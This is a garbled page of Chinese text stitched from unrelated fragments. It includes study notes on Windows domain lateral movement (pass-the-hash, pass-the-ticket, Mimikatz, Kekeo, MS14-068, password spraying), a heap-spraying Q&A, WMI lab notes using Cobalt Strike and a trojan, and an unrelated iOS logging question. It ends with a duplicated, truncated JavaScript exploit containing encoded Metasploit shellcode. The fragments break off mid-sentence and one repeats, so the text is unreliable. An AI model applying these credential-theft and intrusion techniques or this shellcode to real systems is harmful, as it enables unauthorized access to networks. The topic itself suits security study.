用途:个人学习笔记,有所借鉴,欢迎指正目录一、域横向移动-PTH-Mimikatz&NTLM1、Mimikatz2、impacket-at&ps&wmi&smb二、域横向移动-PTK-Mimikatz&AES256三、域横向移动-PTT-漏洞&Kekeo&Ticket 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试四、Linux系统+Proxychains+CrackMapExec-密码喷射一
我读过两篇关于堆喷射的文章:Wikiepdia和thisblogpost.我了解如何将shell代码引入程序的内存中。但是程序是如何跳转到/调用位于堆上的地址内存的呢?什么样的崩溃会调用堆?这种攻击是否需要用一种缓冲区溢出攻击来进行?有没有像缓冲区溢出的黄金法则,即使用函数的n版本(strncpy而不是strcpy)? 最佳答案 如果我没理解错的话,Theycommonlytakeadvantagefromthefactthattheseheapblockswillroughlybeinthesamelocationeverytim
0x01横向移动之wmiwmi可以通过hash或明文进行验证,不会在系统日志中留下痕迹,使用139端口复现环境:god.orgwin2008dcwin2012sqlwin2008web准备:cs上线win2008web提权利用ms14-058抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码)扫描存活主机,扫描端口生成正向连接木马,上传至根目录(方便其他主机下载执行后门)开启socks代理配置全局代理工具(注意代理服务器是cs服务端ip,而不是cs上线主机ip)注意在cs中执行windows命令前面要加shell如shelldir1.自带命令01wmi(无回显)wmi是windows
GoogleConversionPlugin坚持随机记录一些无用的信息,搞砸了我的自动测试报告。 最佳答案 您可以将所有NSLog()输出重定向到任何地方(或控制台日志以外的文件)或让它调用您自己的日志输出函数(不是官方的,但它可以工作),但是这将作用于所有NSLog()调用,不仅作用于来自此Google插件的调用,还作用于来自您代码内的调用。如果您的应用程序是单线程的,您可能会通过自己的日志记录功能来检查全局BOOL当前是否启用了日志记录;但是在多线程环境中,您必须控制每个线程(如果您使用GCD,即使您自己不处理线程,您也是多线程
我通常不难阅读JavaScript代码,但对于这个我无法弄清楚其中的逻辑。该代码来自于4天前发布的漏洞利用。您可以在milw0rm上找到它.代码如下:x//windows/exec-148bytes//http://www.metasploit.com//Encoder:x86/shikata_ga_nai//EXITFUNC=process,CMD=calc.exevarshellcode=unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5c
我通常不难阅读JavaScript代码,但对于这个我无法弄清楚其中的逻辑。该代码来自于4天前发布的漏洞利用。您可以在milw0rm上找到它.代码如下:x//windows/exec-148bytes//http://www.metasploit.com//Encoder:x86/shikata_ga_nai//EXITFUNC=process,CMD=calc.exevarshellcode=unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5c